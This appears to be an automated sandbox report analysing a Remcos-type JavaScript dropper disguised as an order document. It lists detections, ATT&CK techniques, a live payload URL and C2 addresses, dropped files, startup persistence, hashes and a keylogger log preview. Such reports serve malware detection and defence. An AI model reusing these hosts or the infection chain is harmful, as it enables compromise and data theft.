            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match; File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match; File source: 13.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 10.2.VNZVNCXKKJSF.exe.3a0eb38.2.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000A.00000003.388452418.0000000005071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000002.775300132.0000000001167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.700880985.0000000001457000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: VNZVNCXKKJSF.exe PID: 5516, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: RegSvcs.exe PID: 480, type: MEMORYSTR

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | 42 Scripting | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Disable or Modify Tools | 111 Input Capture | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | 1 Native API | 12 Registry Run Keys / Startup Folder | 412 Process Injection | 42 Scripting | LSASS Memory | 12 System Information Discovery | Remote Desktop Protocol | 111 Input Capture | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | 12 Registry Run Keys / Startup Folder | 4 Obfuscated Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 1 Non-Standard Port | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | 1 PowerShell | Logon Script (Mac) | Logon Script (Mac) | 3 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Non-Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | 113 Application Layer Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
            Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 412 Process Injection | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
            [Behavior graph: ID 737570; Sample: Order Specifications PDF.js; Startdate: 03/11/2022; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label
            Order Specifications PDF.js | 27% | ReversingLabs | Script-JS.Trojan.Remcos
            Order Specifications PDF.js | 25% | Virustotal |

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe | 100% | Avira | TR/Dropper.Gen
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe | 100% | Avira | TR/Dropper.Gen
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe | 100% | Avira | TR/Dropper.Gen
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe | 100% | Joe Sandbox ML |
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\VNZVNCXKKJSF[1].exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Woreflint
            C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Woreflint
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe | 65% | ReversingLabs | ByteCode-MSIL.Trojan.Woreflint

            Source | Detection | Scanner | Label
            13.0.RegSvcs.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
            10.0.VNZVNCXKKJSF.exe.540000.0.unpack | 100% | Avira | TR/Dropper.Gen

            Source | Detection | Scanner | Label
            tgc8x.tk | 6% | Virustotal |

            Source | Detection | Scanner | Label
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
            https://sectigo.com/CPS0 | 0% | URL Reputation | safe
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
            http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
            http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
            https://contoso.com/ | 0% | URL Reputation | safe
            https://contoso.com/License | 0% | URL Reputation | safe
            https://contoso.com/Icon | 0% | URL Reputation | safe
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo | 100% | Avira URL Cloud | phishing
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exe | 100% | Avira URL Cloud | malware
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g | 100% | Avira URL Cloud | phishing
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exe | 13% | Virustotal |
            https://go.micros | 0% | Avira URL Cloud | safe
            51.75.209.245 | 0% | Avira URL Cloud | safe

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            tgc8x.tk | 50.115.174.192 | true | true |  | unknown

            Name | Malicious | Antivirus Detection | Reputation
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exe | true | 13%, Virustotal; Avira URL Cloud: malware | unknown
            51.75.209.245 | true | Avira URL Cloud: safe | unknown

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr | false | URL Reputation: safe | unknown
            http://nuget.org/NuGet.exe | powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exepo | wscript.exe, 00000000.00000003.250114367.0000018AB4B65000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: phishing | unknown
            https://sectigo.com/CPS0 | Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr | false | URL Reputation: safe | unknown
            https://go.micros | powershell.exe, 0000000B.00000003.544975348.0000000007A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.422336370.0000000007A26000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://ocsp.sectigo.com0 | Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr | false | URL Reputation: safe | unknown
            http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://geoplugin.net/json.gp/C | VNZVNCXKKJSF.exe, 0000000A.00000002.419463261.0000000003999000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000000.409632130.0000000000456000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | Systedbddfm.exe.11.dr, VNZVNCXKKJSF.exe.0.dr, VNZVNCXKKJSF[1].exe.0.dr | false | URL Reputation: safe | unknown
            https://contoso.com/ | powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://nuget.org/nuget.exe | powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://tgc8x.tk/tt/VNZVNCXKKJSF.exei_g | wscript.exe | true | Avira URL Cloud: phishing | unknown
            https://contoso.com/License | powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://contoso.com/Icon | powershell.exe, 0000000B.00000002.663189764.00000000059DE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.631988238.0000000004981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.787409928.0000000004AC1000.00000004.00000800.00020000.00000000.sdmp | false |  | high
            https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.634730844.0000000004ABB000.00000004.00000800.00020000.00000000.sdmp | false |  | high

            IP | Domain | Country | ASN | ASN Name | Malicious
            50.115.174.192 | tgc8x.tk | United States | 32875 | VIRPUS | true
            51.75.209.245 | unknown | France | 16276 | OVHFR | true

                      Joe Sandbox Version:36.0.0 Rainbow Opal
                      Analysis ID:737570
                      Start date and time:2022-11-03 23:34:01 +01:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 33s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Sample file name:Order Specifications PDF.js
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:21
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (Javascript)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.spre.troj.adwa.spyw.evad.winJS@14/10@1/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 96%
                      • Number of executed functions: 158
                      • Number of non-executed functions: 23
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Override analysis time to 240s for JS/VBS files not yet terminated
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): fs.microsoft.com
                      • Execution Graph export aborted for target RegSvcs.exe, PID 480 because there are no executed function
                      • Execution Graph export aborted for target powershell.exe, PID 5224 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.

            Time | Type | Description
            23:36:00 | API Interceptor | 1x Sleep call for process: VNZVNCXKKJSF.exe modified
            23:37:21 | API Interceptor | 42x Sleep call for process: powershell.exe modified
            23:37:50 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
            23:37:59 | API Interceptor | 1x Sleep call for process: Systedbddfm.exe modified

            Match | Associated Sample Name / URL | Detection
            50.115.174.192 | RFQ.exe | malicious
            50.115.174.192 | RFQ- PO90064765002293.exe | malicious
            50.115.174.192 | output(3).js | malicious
            50.115.174.192 | PO_1276445.js | malicious
            50.115.174.192 | Purchase inquiry .js | malicious
            50.115.174.192 | StZAEFSb2j.exe | malicious
            50.115.174.192 | U8RYIwIvfK.exe | malicious
            50.115.174.192 | DHL SHIPMENT INVOICE.js | malicious
            50.115.174.192 | CnptEaXHK7.exe | malicious
            50.115.174.192 | PO.exe | malicious
            50.115.174.192 | RFQ# 6000163267.js | malicious
            50.115.174.192 | WY220353098B.js | malicious
            50.115.174.192 | PO-4290971524_11-2-2022.js | malicious
            50.115.174.192 | vNrvIu0ujD.exe | malicious
            50.115.174.192 | file.exe | malicious
            50.115.174.192 | file.exe | malicious
            50.115.174.192 | file.exe | malicious
            50.115.174.192 | file.exe | malicious
            50.115.174.192 | file.exe | malicious
            50.115.174.192 | file.exe | malicious
            51.75.209.245 | DHL SHIPMENT INVOICE.js | malicious
            51.75.209.245 | file.exe | malicious
            51.75.209.245 | file.exe | malicious
            51.75.209.245 | file.exe | malicious
            51.75.209.245 | file.exe | malicious
            51.75.209.245 | DHL SHIPPING DOCUMENTS.js | malicious
            51.75.209.245 | RFQ 01.300.TRGVH.exe | malicious
            51.75.209.245 | TNT Shipping Documents.js | malicious
            51.75.209.245 | file.exe | malicious
            51.75.209.245 | NEW ORDER 27.10.2022.exe | malicious
            51.75.209.245 | TNT Shipping Documents.exe | malicious
            51.75.209.245 | PAYMENT COPY.js | malicious
            51.75.209.245 | RFQ No. 01.300.TRGVH.exe | malicious
            51.75.209.245 | PAYMENT COPY.exe | malicious
            51.75.209.245 | Request For Quotation 01.300.TRGVH.exe | malicious
            51.75.209.245 | Request For Quotation 01.300.TRGVH.exe | malicious
            51.75.209.245 | Request For Quotation 01.300.TRGVH.exe | malicious
            51.75.209.245 | TNT Original Invoice.exe | malicious
            51.75.209.245 | NEW PURCHASE ORDER 7A68D20.exe | malicious
            51.75.209.245 | PAYMENT COPY.exe | malicious

            Match | Associated Sample Name / URL | Detection | Context
            tgc8x.tk | RFQ.exe | malicious | 50.115.174.192
            tgc8x.tk | RFQ- PO90064765002293.exe | malicious | 50.115.174.192
            tgc8x.tk | output(3).js | malicious | 50.115.174.192
            tgc8x.tk | PO_1276445.js | malicious | 50.115.174.192
            tgc8x.tk | Purchase inquiry .js | malicious | 50.115.174.192
            tgc8x.tk | StZAEFSb2j.exe | malicious | 50.115.174.192
            tgc8x.tk | U8RYIwIvfK.exe | malicious | 50.115.174.192
            tgc8x.tk | DHL SHIPMENT INVOICE.js | malicious | 50.115.174.192
            tgc8x.tk | CnptEaXHK7.exe | malicious | 50.115.174.192
            tgc8x.tk | PO.exe | malicious | 50.115.174.192
            tgc8x.tk | RFQ# 6000163267.js | malicious | 50.115.174.192
            tgc8x.tk | WY220353098B.js | malicious | 50.115.174.192
            tgc8x.tk | PO-4290971524_11-2-2022.js | malicious | 50.115.174.192
            tgc8x.tk | vNrvIu0ujD.exe | malicious | 50.115.174.192
            tgc8x.tk | file.exe | malicious | 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                      • 50.115.174.192
                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):216
                                                                                                      Entropy (8bit):3.3448102746557975
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:rnlSlLl8alFNqlDl5JWRal2Jl+7R0DAlBG45klovDl6ALilXIkqoojklovDl6v:0lRjF4b5YcIeeDAlOWAAe5q1gWAv
                                                                                                      MD5:4E985ACC86743F3E1726CB9DAEE285AD
                                                                                                      SHA1:F6BCE911E5AFC3194AEAF4180BF934D45C6B21C5
                                                                                                      SHA-256:2AE29D539D27B0B585AEE9E303F72348C942D84856D38428C4DDFE0D1ABC3CC1
                                                                                                      SHA-512:70A17A221875B019321FA9C534B34D18A987A42C112AD2B86CFF7D6DE7CDBFDC90C172CE7CD7EA5603E045D28E308775A5BD39AD93D68EC117E691C089AF7BCB
                                                                                                      Malicious:true
                                                                                                      Preview:....[.2.0.2.2./.1.1./.0.3. .2.3.:.3.6.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....[.W.i.n.].r.....[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systedbddfm.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):5.347480285514745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                      MD5:7758BEB381EB8F360E01D8E3C7D2F776
                                                                                                      SHA1:5604F98BBFC87B90608925EC9F71764FA66F7BD7
                                                                                                      SHA-256:8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
                                                                                                      SHA-512:B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\VNZVNCXKKJSF.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):5.347480285514745
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q3La/hz92n4M0kvoDLI4MWuCqDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:MLU84jE4K5E4Ks2wKDE4KhK3VZ9pKhk
                                                                                                      MD5:7758BEB381EB8F360E01D8E3C7D2F776
                                                                                                      SHA1:5604F98BBFC87B90608925EC9F71764FA66F7BD7
                                                                                                      SHA-256:8B334E9179AE9A14ECA27010AACA1BE58F208D5FFEFAFE03AD6A4D5891DE601E
                                                                                                      SHA-512:B9E9206F548AE1C9ED4BE86015CFAF65017CCE1C64F633557CA861D1570D8DACA3B9FC8515D83207370635E2D13D60004231B4C5AA5D3236C9C0CF21E53323EB
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
                                                                                                      SHA-512:7168D9F2942F97FEA59F907A8F08176CCC794B52079605167E42095871BA6D4CF5546F2F4E3FE304D0CE800F47D671E9187204B27031FE0369F6E28ABD703180
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 65%
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8003
                                                                                                      Entropy (8bit):4.839308921501875
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                                                                                      MD5:937C6E940577634844311E349BD4614D
                                                                                                      SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                                                                                      SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                                                                                      SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                                                                                      Malicious:false
                                                                                                      Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15988
                                                                                                      Entropy (8bit):5.563006209243009
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:Ote+X7cQCw5qXePt0cGp3e5SjnWl8HaZQRbpHcu5Yb:UdEGtR/oWl8HaZqNHGb
                                                                                                      MD5:63F7A25CAD5BC37BA07AAFD86658FCCF
                                                                                                      SHA1:C46CD4F320BCC66A04EE1F084B0660312AB4E6F7
                                                                                                      SHA-256:5FDF56517CFE33276FB178B0986447354C7909563F9B6B49DA7474DD2642F15E
                                                                                                      SHA-512:9FA2357E49FE7139C25E147248354D91CAB76C105FAE238524910828DFB90C6F070364EB49D3E899E025294916C218810FCA17B27ED62982F91E9D9842C58937
                                                                                                      Malicious:false
                                                                                                      Preview:@...e...........h.....................H.6............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                      Process:C:\Windows\System32\wscript.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):613184
                                                                                                      Entropy (8bit):7.954016806295198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:AcmcUFUmv2r+ea8u3gNT/dc8uOJ5psUME+hWk+y5Ci/Vr:AEUir3bN/d0ov+hbzNtr
                                                                                                      MD5:5ED905205AEB85AF64B2FF567A8CF838
                                                                                                      SHA1:8C8F1A28C100CCB9192DC496B61B978802907045
                                                                                                      SHA-256:1F67C6E30CA78B6DB87A70C44E71B19D20778913C9226E94F8AF74D8538BBB35
